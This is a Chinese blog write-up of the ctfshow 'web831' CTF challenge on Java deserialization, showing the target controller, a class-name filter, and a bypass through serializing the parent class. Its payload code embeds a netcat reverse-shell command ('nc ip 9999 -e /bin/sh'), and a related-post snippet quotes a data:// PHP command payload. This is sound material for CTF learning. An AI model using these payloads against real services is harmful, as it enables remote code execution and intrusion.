ctfshow-web831

最新推荐文章于 2024-02-25 14:07:39 发布
最新推荐文章于 2024-02-25 14:07:39 发布
阅读量455 收藏
点赞数
分类专栏: ctfshow 文章标签: servlet java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/125561322
版权

一、题目分析

第三道基础java反序列化题了,这道题有一个防御,SafeObjectInputStream这个 类里面有一个resolveClass方法,听师傅说类似于php的__wakeup方法,一下子就恍然大悟。简单的看一下他的作用,就是判断是否是User类,如果是的话就抛出异常,那我们是不是没法做了呢,我们注意到User类是继承了BaseUser类的,也就是说,我们直接创建一个User的父类,BaseUser类就好了,这样就绕过了他的安全检测。

package com.ctfshow.controller;

import com.ctfshow.entity.User;
import com.ctfshow.util.SafeObjectInputStream;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;

import javax.servlet.http.HttpServletRequest;
import java.io.ByteArrayInputStream;
import java.io.FileInputStream;
import java.io.ObjectInputStream;
import java.util.Base64;

/**
 * @Auther: h1xa
 * @Date: 2022-06-09 23:36
 * @Description:
 */
@Controller
@RequestMapping("/")
public class IndexController {

    @RequestMapping(value = "/",method = RequestMethod.POST)
    @ResponseBody
    public String index(HttpServletRequest request){
        User user=null;
        try {
            byte[] userData = Base64.getDecoder().decode(request.getParameter("userData"));
            SafeObjectInputStream safeObjectInputStream = new SafeObjectInputStream(new ByteArrayInputStream(userData));
            user = (User) safeObjectInputStream.readUnshared();
        }catch (ClassNotFoundException e){
            return "User class can not unserialize";
        } catch (Exception e){
            e.printStackTrace();
            return "unserialize error";
        }

        return "unserialize done, you username is "+user.getName();
    }

    @RequestMapping(value = "/",method = RequestMethod.GET)
    @ResponseBody
    public String index(){
        return "plz post parameter 'userData'  to unserialize";
    }
}

package com.ctfshow.util;

import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;

/**
 * @Auther: h1xa
 * @Date: 2022-06-11 19:00
 * @Description:
 */
public class SafeObjectInputStream extends ObjectInputStream {

    public SafeObjectInputStream(InputStream in) throws IOException {
        super(in);
    }
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String[] className = desc.getName().split("\\.");
        if(className[className.length-1].equals("User")){
            throw new ClassNotFoundException("ClassName Not Support!");
        }else{
            return super.resolveClass(desc);
        }
    }

}

 二、写代码咯

代码终于写熟起来了,这次就把写的完整代码贴出来。之前文章我没贴多余的代码。


public class IndexController {
    public static void main(String[] args) throws IOException {

        BaseUser baseUser = new BaseUser();
        baseUser.secret="nc ip 9999 -e /bin/sh";


        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(baseUser);
        byte[] encode = Base64.getEncoder().encode(byteArrayOutputStream.toByteArray());
        for (int i = 0; i < encode.length; i++) {
            System.out.print((char)encode[i]);

        }

    }
}

然后就是nc监听,运行payload,反弹shell。

 

  三、总结

1、这里就一个知识点,绕waf,创建父类这个想法。

2、然后我对代码的熟悉程度提高了。

angelkat
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web830
lastwinn的博客
07-01 253
记录自己的所学以及理解。
CTFSHOW 常用姿势篇(821-831
羽的博客
06-09 1655
ctfshow 常用姿势篇
ctfshow学习记录-web入门(文件包含78-87)
龟速更新的九某人
07-04 1695
ctfshow学习记录-web入门(文件包含web78-87)
Web】CTFSHOW 常用姿势刷题记录(全)
最新发布
uuzeray的博客
02-25 1839
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
ctf-web刷题-ctfshow-爆破-web23
None安全团队
08-01 596
看一下代码 接收get参数token,然后把接收到的值进行md5加密,再判断第2位和第15位是否完全相等 并且 第十五位和第十八位也完全相等 完全前面的要求之后还要判断第二位 第十五位 第十八位取int值后进行相加是否等于第32位 这里的话给出的解题方案就是通过脚本 1-9 a-z组合生成md5 然后进行判断 是否符合条件 #coding: utf-8 #啊韬 import hashlib dic = '0123456789qazwsxedcrfvtgbyhnujmikolp' md5 =...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow web(不定期更新)
pakho_C的博客
09-23 2700
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php://input将会无效。MD5弱等于绕过:有些字符md5后的值为0e开头,会被当做科学计数法,也就是0.所以当找到2个字符md5后的值都为0e开头时即可绕过。绕过方法:如果是以数字开头的字符串,使用is_numeric的时候会自动去掉后面的字符,将其前面的数字取出来判断。web3的升级,过滤了php伪协议,使用日志注入。
[ctfshow web入门]常用姿势813-816
weixin_45751765的博客
05-02 1660
参考 https://www.anquanke.com/post/id/254388 https://download.qingteng.cn/frontendcdn/2019/06/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6-%E7%BB%95%E8%BF%87php%E7%9A%84disable_functions%EF%BC%88%E4%B8%8A%E7%AF%87%EF%BC%89.pdf 看id调用了哪些c语言库函数 编译同名函数进行劫持 注意进行unset(L
ctfshow-web829
lastwinn的博客
07-01 562
记录自己的所学以及理解。
request.getParameter()方法
热门推荐
wdgkw的专栏
12-11 10万+
request.getParameter()方法:1.获取通过http协议提交过来的数据.       通过容器的实现来取得通过get或者post方式提交过来的数据 2.request.getParameter()方法传递的数据,会从web客户端传到web服务器端,代表HTTP请求数据,该方法返回String类型的数据 request.setAttribute()和getAttribute
java代码审计之浅谈Java反序列化漏洞修复方案
liguangyao213的博客
02-19 4101
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 概述 序列化是让 Java 对象脱离 Java 运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java程序使用ObjectInputStream对象的readObject方法将反序列化数据转换为java对象。但当输入的反序列化的数据可被用户控制,那么攻击者即
CTFshow web入门——文件包含
小元砸的博客
02-07 3522
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTFshow_web入门_文件包含
ScyLamb的博客
03-09 906
文件包含 文章目录文件包含0x00 web780x01 web790x02 web800x03 web810x04 web820x05 web830x06 web840x07 web850x08 web860x09 web870x0A web880x0B web1160x0C web117 0x00 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); 无过滤 ?file=php://filter/
(七)java.io.ObjectInputStream类详解
OceanSky的专栏
02-22 1万+
1.public class ObjectInputStream extends InputStream implements ObjectInput, ObjectStreamConstants 分析:ObjectInputStream是将对象的原始数据序列化,ObjectOutputStream将序列化的数据反序列化。当分别使用FileInputStream和FileOutStream做为输...
Java 对象流(ObjectInputStream,ObjectOutputStream)详细解析!!!
m0_51517626的博客
08-31 2067
对象流(ObjectInputStream,ObjectOutputStream) 概述 ObjectInputStream,ObjectOutputStream可以对基本数据类型数据和对象进行存取操作,它的强大之处在于可以将Java中的对象进行存储即序列化与反序列化 序列化:将Java对象存储到与平台无关的二进制文件或通过网络传输到另一个网络节点 使用ObjectOutputStream 反序列化:将Java对象从文件读取到内存中,使用ObjectInputStream Java对象的存取条件 1.对象所
ctfshow web签到题
09-12
ctfshow-web中的"web签到题"是其中的一道题目。具体信息如下: 请注意,网站的内容中包含了一个URL:/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?> 。这个URL可能与web签到题有关。 此外,网站中还包含了一个meta标签:<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 。这个标签指定了网页的字符编码格式。 综上所述,您可以尝试访问ctfshow-web,并查找与web签到题相关的内容。您可以注意URL和meta标签中的信息,这可能有助于解决这道题目。祝您好运!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值